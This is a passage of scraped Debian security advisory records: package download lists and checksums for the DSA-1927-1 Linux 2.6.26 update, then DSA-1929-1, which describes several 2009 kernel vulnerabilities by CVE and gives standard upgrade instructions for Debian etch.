http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-19lenny2_all.deb\n Size/MD5 checksum: 48672074 5aa4d0110919b100a772509455b22757\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-19lenny2_all.deb\n Size/MD5 checksum: 1768032 cb95ea5101339c35d425ac1ba2f0ff02\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-19lenny2_all.deb\n Size/MD5 checksum: 122160 0d3dd77a86989aa6e6bdfbbf548d22a6\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-19lenny2_alpha.deb\n Size/MD5 checksum: 106376 891beea699175e77b6f4cdb1dbbd2377\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-19lenny2_alpha.deb\n Size/MD5 checksum: 363880 278fefb639e7029af6d5017dedefb500\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-19lenny2_alpha.deb\n Size/MD5 checksum: 28487296 beb21f0f222b507898406b051d161c25\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-19lenny2_alpha.deb\n Size/MD5 checksum: 106358 b4c10db49252b22e7019746743624712\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-19lenny2_alpha.deb\n Size/MD5 checksum: 741234 b08b288693ab9d0d3fa1e8141ba4f038\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-19lenny2_alpha.deb\n Size/MD5 checksum: 28471478 f412fb78f0dfac51f6e39a035538fe91\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-19lenny2_alpha.deb\n Size/MD5 checksum: 365312 9147bf190b4dce64fb4783b0c0aba8be\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-19lenny2_alpha.deb\n Size/MD5 checksum: 364408 66cd6736f72c0eedabbad596baac8888\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-19lenny2_alpha.deb\n Size/MD5 checksum: 29177668 abb9bcc21a5fcb0a7352a30fb7209ca1\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-19lenny2_alpha.deb\n Size/MD5 checksum: 3543732 d84be29426f1d706617a6ad91d3b6109\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-19lenny2_amd64.deb\n Size/MD5 checksum: 389134 2ac60b6aaece8351c023cecbb4bd41ee\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-19lenny2_amd64.deb\n Size/MD5 checksum: 749556 c994eeb54dd967b5255448e80fa4911c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-amd64_2.6.26-19lenny2_amd64.deb\n Size/MD5 checksum: 389740 8b6b5b10fe023670ca8cf9326d46ccd0\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-amd64_2.6.26-19lenny2_amd64.deb\n Size/MD5 checksum: 394262 8398b2d9ce752ffa39ac55b8f55fa1b7\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-19lenny2_amd64.deb\n Size/MD5 checksum: 3719144 1fa20cc556fbfecdf0c2335a3c9edeee\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-19lenny2_amd64.deb\n Size/MD5 checksum: 106352 edb758613531f5c655c8451f1136b62a\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-amd64_2.6.26-19lenny2_amd64.deb\n Size/MD5 checksum: 106378 dd749481c75a66f517551c6b21b3bbbb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-amd64_2.6.26-19lenny2_amd64.deb\n Size/MD5 checksum: 19274410 21621e01b880d1f222007e3101d255c6\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-amd64_2.6.26-19lenny2_amd64.deb\n Size/MD5 checksum: 21053742 015990eedbce234dfa4facdf02f6ad60\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-19lenny2_amd64.deb\n Size/MD5 checksum: 3851500 355a9cc7757195196006160929313e78\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-amd64_2.6.26-19lenny2_amd64.deb\n Size/MD5 checksum: 20902812 3af1d1431ff5674b7aeaf41c784d3ba6\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-19lenny2_amd64.deb\n Size/MD5 checksum: 3751848 f5289bf2c22a6112d13a9af6d4291226\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-amd64_2.6.26-19lenny2_amd64.deb\n Size/MD5 checksum: 1804900 8ea5afa2f5e29175e92975ef93144b9a\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-amd64_2.6.26-19lenny2_amd64.deb\n Size/MD5 checksum: 106334 2620974dbbc17bbab4aefe183584a6da\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-19lenny2_amd64.deb\n Size/MD5 checksum: 3774804 8fa1254acec879820c17dd8e2e4eee56\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-19lenny2_amd64.deb\n Size/MD5 checksum: 20886016 71a1f29b66ee30cf7a63b77cddc71ec7\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-amd64_2.6.26-19lenny2_amd64.deb\n Size/MD5 checksum: 383280 0d0cad637c14a594b3ae424abf824608\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-19lenny2_armel.deb\n Size/MD5 checksum: 365550 f97d5bcae3c5c5957781e6507d730780\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-19lenny2_armel.deb\n Size/MD5 checksum: 12396344 04df2ffe832cba3ea1e299701069ca96\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-versatile_2.6.26-19lenny2_armel.deb\n Size/MD5 checksum: 335184 ff1387cae5afb9c7b2d8b20ab546293f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-19lenny2_armel.deb\n Size/MD5 checksum: 4136850 e7e7742e3ead70e194f540432bf93ba6\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-19lenny2_armel.deb\n Size/MD5 checksum: 747792 89242eec0e6f453f37b228ddb49e4e26\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-19lenny2_armel.deb\n Size/MD5 checksum: 11680082 d9133e003cd603924930f1db870c6d46\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-19lenny2_armel.deb\n Size/MD5 checksum: 106354 fce271c39eaa874f6a570b9298a13836\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-versatile_2.6.26-19lenny2_armel.deb\n Size/MD5 checksum: 9575158 d8c6ec6842339c8d8391916c7b4a25c2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-19lenny2_armel.deb\n Size/MD5 checksum: 11371016 edc9b10b99e73302ef1853db546ed6bb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-19lenny2_armel.deb\n Size/MD5 checksum: 363118 ca61af313ac3687b042c82e4c56bd078\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-armel_2.6.26-19lenny2_armel.deb\n Size/MD5 checksum: 106390 d14317d669c70ea8458b0138105be3e0\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-19lenny2_armel.deb\n Size/MD5 checksum: 360844 1c7437e1e4de9358f7975feae74501f0\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64_2.6.26-19lenny2_hppa.deb\n Size/MD5 checksum: 17070158 92d872205303ea622d1419d074b54737\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc_2.6.26-19lenny2_hppa.deb\n Size/MD5 checksum: 296434 df3ddd0a0dbfa712201ff031bfc109c0\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc-smp_2.6.26-19lenny2_hppa.deb\n Size/MD5 checksum: 16323830 9998a4deead3033e07f28a1cd0816136\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64_2.6.26-19lenny2_hppa.deb\n Size/MD5 checksum: 297894 8cace7fc519c562d4b8657c75d230815\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-19lenny2_hppa.deb\n Size/MD5 checksum: 3594236 8d621635c43fb9540d4a68ef6d891a57\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-19lenny2_hppa.deb\n Size/MD5 checksum: 106356 f967499d62622f5f0833539c9eaf2359\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-hppa_2.6.26-19lenny2_hppa.deb\n Size/MD5 checksum: 106380 f518c1de9ce8dd272db1afa30e38999a\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc_2.6.26-19lenny2_hppa.deb\n Size/MD5 checksum: 15731364 d50829b0556bc7fef6e8c505db959ee2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-19lenny2_hppa.deb\n Size/MD5 checksum: 759840 faab7849f3cef86fbebc037cbd00fd76\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64-smp_2.6.26-19lenny2_hppa.deb\n Size/MD5 checksum: 17614856 6311929870350217721f7f194b6ff585\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64-smp_2.6.26-19lenny2_hppa.deb\n Size/MD5 checksum: 299160 57fd97b01842bbe74e37f443e346d695\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc-smp_2.6.26-19lenny2_hppa.deb\n Size/MD5 checksum: 298110 631076db8957d15ab8b0161a60e31734\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-19lenny2_i386.deb\n Size/MD5 checksum: 398182 6f93bf37534bcfb9162b9985b83ee38f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-19lenny2_i386.deb\n Size/MD5 checksum: 20502134 d39255c90c67fddda4c3cb49ce6c93e1\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-19lenny2_i386.deb\n Size/MD5 checksum: 20235868 99b3ed110df3b6b2bb6b06feb9d30b72\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-19lenny2_i386.deb\n Size/MD5 checksum: 106354 835280ec5ad990b0bcebb988953bd5d9\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-19lenny2_i386.deb\n Size/MD5 checksum: 20326344 9192cd01f84e7192159aefec2c4f8fb9\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-19lenny2_i386.deb\n Size/MD5 checksum: 20208578 c118b5d6fc4f5007728d1ab804624cd8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-19lenny2_i386.deb\n Size/MD5 checksum: 398052 88be8c6ce0726c87f3127e1ea8b1a382\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-19lenny2_i386.deb\n Size/MD5 checksum: 20175038 ee7bf2ce4d4557f9fdfb53790627ebac\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-19lenny2_i386.deb\n Size/MD5 checksum: 3719206 0d8393bd6245aa3d23ef8938477d5f63\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-19lenny2_i386.deb\n Size/MD5 checksum: 20353680 67f48fcd0835fd230e8583cf2676cf09\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-19lenny2_i386.deb\n Size/MD5 checksum: 398494 bf4ef1c3e9f35ec4dc0bfaeda1ee5516\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-19lenny2_i386.deb\n Size/MD5 checksum: 3851592 94a16944e91f5594a6fa02115b680434\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-19lenny2_i386.deb\n Size/MD5 checksum: 400332 d734fb2f035f0a6a041d13f5a3d95c6c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-19lenny2_i386.deb\n Size/MD5 checksum: 749582 26580da1f40ffeeb17146765bbe241f8\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-19lenny2_i386.deb\n Size/MD5 checksum: 106348 b76709d63441fcc3e285d2a6dc999890\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-19lenny2_i386.deb\n Size/MD5 checksum: 20864938 cc5255ece9764242c63b522abfd8a517\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-19lenny2_i386.deb\n Size/MD5 checksum: 399328 c929aa19b40e7eea5ea885148c645a17\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-19lenny2_i386.deb\n Size/MD5 checksum: 3751908 3b936dbeaf13b730ab8dd56e5ab726f9\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-19lenny2_i386.deb\n Size/MD5 checksum: 387338 03fd54819fb7176a176eeb4c2ff0209c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-19lenny2_i386.deb\n Size/MD5 checksum: 403790 efa7179643f2f709cace01bb3f4a5580\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-19lenny2_i386.deb\n Size/MD5 checksum: 3774936 088f38a8e9c79bb4ddc67e200ebee754\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-19lenny2_i386.deb\n Size/MD5 checksum: 1591850 93ad5d17c9e8ac22c3544c8a9ad9eabd\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-19lenny2_i386.deb\n Size/MD5 checksum: 384698 5cc9137a10772a48628b0014e0dbbc15\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-19lenny2_i386.deb\n Size/MD5 checksum: 106404 04d07f928e22a2150a2bb9188c6f1257\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-19lenny2_i386.deb\n Size/MD5 checksum: 18035618 641b34424aad0e9291713bd9e2bf96e5\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-itanium_2.6.26-19lenny2_ia64.deb\n Size/MD5 checksum: 355640 2bce0c1faefc019460e3eebca333a5fc\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-19lenny2_ia64.deb\n Size/MD5 checksum: 3654768 d8fb31f9660b7c0ab42c77e89bf82f1f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-itanium_2.6.26-19lenny2_ia64.deb\n Size/MD5 checksum: 355064 cfb3eee78e3860b2e650716d5032bf5d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-19lenny2_ia64.deb\n Size/MD5 checksum: 3687386 2980814479dbd08d39bd9f92d3005838\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-mckinley_2.6.26-19lenny2_ia64.deb\n Size/MD5 checksum: 355046 62fc734ea7fe9bc4bef1f8d8b65cc027\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-mckinley_2.6.26-19lenny2_ia64.deb\n Size/MD5 checksum: 34349456 5cfb3ccf034f0ce13a5861507c4cb758\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-itanium_2.6.26-19lenny2_ia64.deb\n Size/MD5 checksum: 34103026 3cee486177d22e2fcd816b536d7ac3d3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-19lenny2_ia64.deb\n Size/MD5 checksum: 106350 6265837dd3c0105bcba9d40c5b6966f9\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-mckinley_2.6.26-19lenny2_ia64.deb\n Size/MD5 checksum: 355698 27152c116ad66c7862f3890d36ac80ab\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-mckinley_2.6.26-19lenny2_ia64.deb\n Size/MD5 checksum: 34288678 1540b7be96fbb68e4cc01d858c5ef5a4\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-ia64_2.6.26-19lenny2_ia64.deb\n Size/MD5 checksum: 106384 bfb7eeaec3d89587561c56afec1816e9\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-itanium_2.6.26-19lenny2_ia64.deb\n Size/MD5 checksum: 34165098 7a4fbe457d07807a74e9950a47975d49\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-19lenny2_ia64.deb\n Size/MD5 checksum: 748220 03f583157c7eef60269042b9a5a6d0bc\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-19lenny2_powerpc.deb\n Size/MD5 checksum: 106358 5431bb9d2abe49fc1b186f44bf440cba\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-19lenny2_powerpc.deb\n Size/MD5 checksum: 756032 fb287119a4cf07ef9d6d633ad30f7236\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc64_2.6.26-19lenny2_powerpc.deb\n Size/MD5 checksum: 372504 9c0501a81bf32b1d0b8c939830d9789b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc_2.6.26-19lenny2_powerpc.deb\n Size/MD5 checksum: 23650232 ece0b68e6c9baa2e0f964d2bc7da21a2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-19lenny2_powerpc.deb\n Size/MD5 checksum: 3856256 5a6eb8c2fe7930456cf5f3a1c257fed1\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc64_2.6.26-19lenny2_powerpc.deb\n Size/MD5 checksum: 23514630 0aa445df9e479dc6e266a97658c5c675\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc64_2.6.26-19lenny2_powerpc.deb\n Size/MD5 checksum: 23453120 7fdf0e57cb3324433e8f5d3e71c5cb7c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc-smp_2.6.26-19lenny2_powerpc.deb\n Size/MD5 checksum: 23619598 7eb565a76c6ab3318d32c134f7da26b0\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc-smp_2.6.26-19lenny2_powerpc.deb\n Size/MD5 checksum: 366586 3e8f8e0d8d9dc83a3e009bbdcca04d21\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-19lenny2_powerpc.deb\n Size/MD5 checksum: 3890668 a75da89a00e2b5118869888ea03580ae\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc64_2.6.26-19lenny2_powerpc.deb\n Size/MD5 checksum: 373766 78d152d9edb14f5d179dde50a0131ea7\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc_2.6.26-19lenny2_powerpc.deb\n Size/MD5 checksum: 366686 4b13a456e727a9259685b74132c5b730\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-powerpc_2.6.26-19lenny2_powerpc.deb\n Size/MD5 checksum: 106396 33f493756428189d3acc36bde21631ed\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc_2.6.26-19lenny2_powerpc.deb\n Size/MD5 checksum: 365950 4149c4f9e6f3e0dc0fbb639a2f962cf8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc_2.6.26-19lenny2_powerpc.deb\n Size/MD5 checksum: 23216978 b0034a3be5877f2edebf6ec71c70a83e\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n", "modified": "2009-11-05T16:21:20", "published": "2009-11-05T16:21:20", "id": "DEBIAN:DSA-1927-1:8E712", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00250.html", "title": "[SECURITY] [DSA 1927-1] New Linux 2.6.26 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-05-30T02:22:39", "bulletinFamily": "unix", "description": "- ----------------------------------------------------------------------\nDebian Security Advisory DSA-1929-1 security@debian.org\nhttp://www.debian.org/security/ Dann Frazier\nNovember 5, 2009 http://www.debian.org/security/faq\n- ----------------------------------------------------------------------\n\nPackage : linux-2.6\nVulnerability : privilege escalation/denial of service/sensitive memory leak\nProblem type : local\nDebian-specific: no\nCVE Id(s) : CVE-2009-1883 CVE-2009-2909 CVE-2009-3001 CVE-2009-3002\n CVE-2009-3228 CVE-2009-3238 CVE-2009-3286 CVE-2009-3547\n CVE-2009-3612 CVE-2009-3621\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service, sensitive memory leak or privilege\nescalation. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2009-1883\n\n Solar Designer discovered a missing capability check in the\n z90crypt driver or s390 systems. This vulnerability may allow\n a local user to gain elevated privileges.\n\nCVE-2009-2909\n\n Arjan van de Ven discovered an issue in the AX.25 protocol\n implementation. A specially crafted call to setsockopt() can\n result in a denial of service (kernel oops).\n\nCVE-2009-3001\n\n Jiri Slaby fixed a sensitive memory leak issue in the ANSI/IEEE\n 802.2 LLC implementation. This is not exploitable in the Debian\n lenny kernel as root privileges are required to exploit this\n issue.\n\nCVE-2009-3002\n\n Eric Dumazet fixed several sensitive memory leaks in the IrDA,\n X.25 PLP (Rose), NET/ROM, Acorn Econet/AUN, and Controller Area\n Network (CAN) implementations. Local users can exploit these\n issues to gain access to kernel memory.\n\nCVE-2009-3228\n\n Eric Dumazet reported an instance of uninitialized kernel memory\n in the network packet scheduler. Local users may be able to\n exploit this issue to read the contents of sensitive kernel\n memory.\n \nCVE-2009-3238\n\n Linus Torvalds provided a change to the get_random_int() function\n to increase its randomness.\n\nCVE-2009-3286\n\n Eric Paris discovered an issue with the NFSv4 server\n implementation. When an O_EXCL create fails, files may be left\n with corrupted permissions, possibly granting unintentional\n privileges to other local users.\n\nCVE-2009-3547\n\n Earl Chew discovered a NULL pointer dereference issue in the\n pipe_rdwr_open function which can be used by local users to gain\n elevated privileges.\n\nCVE-2009-3612\n\n Jiri Pirko discovered a typo in the initialization of a structure\n in the netlink subsystem that may allow local users to gain access\n to sensitive kernel memory.\n\nCVE-2009-3621\n\n Tomoki Sekiyama discovered a deadlock condition in the UNIX domain\n socket implementation. Local users can exploit this vulnerability\n to cause a denial of service (system hang).\n\nFor the oldstable distribution (etch), this problem has been fixed in\nversion 2.6.18.dfsg.1-26etch1.\n\nWe recommend that you upgrade your linux-2.6, fai-kernels, and\nuser-mode-linux packages.\n\nNote: Debian &#x27;etch&#x27; includes linux kernel packages based upon both the\n2.6.18 and 2.6.24 linux releases. All known security issues are\ncarefully tracked against both packages and both packages will receive\nsecurity updates until security support for Debian &#x27;etch&#x27;\nconcludes. However, given the high frequency at which low-severity\nsecurity issues are discovered in the kernel and the resource\nrequirements of doing an update, lower severity 2.6.18 and 2.6.24\nupdates will typically release in a staggered or &quot;leap-frog&quot; fashion.\n\nThe following matrix lists additional source packages that were rebuilt for\ncompatability with or to take advantage of this update:\n\n Debian 4.0 (etch)\n fai-kernels 1.17+etch.26etch1\n user-mode-linux 2.6.18-1um-2etch.26etch1\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nOldstable updates are available for alpha, amd64, hppa, i386,\nia64, powerpc and s390 architectures. Updates for other\narchitectures will be released as the they become available.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-26etch1.diff.gz\n Size/MD5 checksum: 5514957 b9cb3b1e1ba1196b9020e6d07d48b752\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-26etch1.dsc\n Size/MD5 checksum: 5673 4ba2595893287a7b82713ca182aad7be\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1.orig.tar.gz\n Size/MD5 checksum: 52225460 6a1ab0948d6b5b453ea0fce0fcc29060\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.18-6_2.6.18.dfsg.1-26etch1_all.deb\n Size/MD5 checksum: 3721660 836e780dd306ee60318d8ac1c28087eb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.18_2.6.18.dfsg.1-26etch1_all.deb\n Size/MD5 checksum: 41474520 7457b0e444adb6b31dbcda82768671cd\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.18_2.6.18.dfsg.1-26etch1_all.deb\n Size/MD5 checksum: 1852976 ec11d9e2967a87b27fac807f80218d0e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.18_2.6.18.dfsg.1-26etch1_all.deb\n Size/MD5 checksum: 58896 e7dc19b1c3f0a22c1764420642117fa8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.18_2.6.18.dfsg.1-26etch1_all.deb\n Size/MD5 checksum: 3593482 146e26a9c17bfa1a0a1fa198afdf1c70\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.18_2.6.18.dfsg.1-26etch1_all.deb\n Size/MD5 checksum: 1091166 7a089920e547412d07cf1ef44e47bbb1\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-alpha_2.6.18.dfsg.1-26etch1_alpha.deb\n Size/MD5 checksum: 58290 7a1661641c432bc5a1e442a71f0584ac\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-26etch1_alpha.deb\n Size/MD5 checksum: 58254 223e25b49b1ce3fefe9934ecdda7cec4\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-26etch1_alpha.deb\n Size/MD5 checksum: 23374558 fc6fad80b66536f0c86fe4a4923057fa\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-generic_2.6.18.dfsg.1-26etch1_alpha.deb\n Size/MD5 checksum: 266914 bd1cb44848eb7ed46418783e958046de\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-26etch1_alpha.deb\n Size/MD5 checksum: 267502 b719376ff7b69b31e59f49010c249d17\n 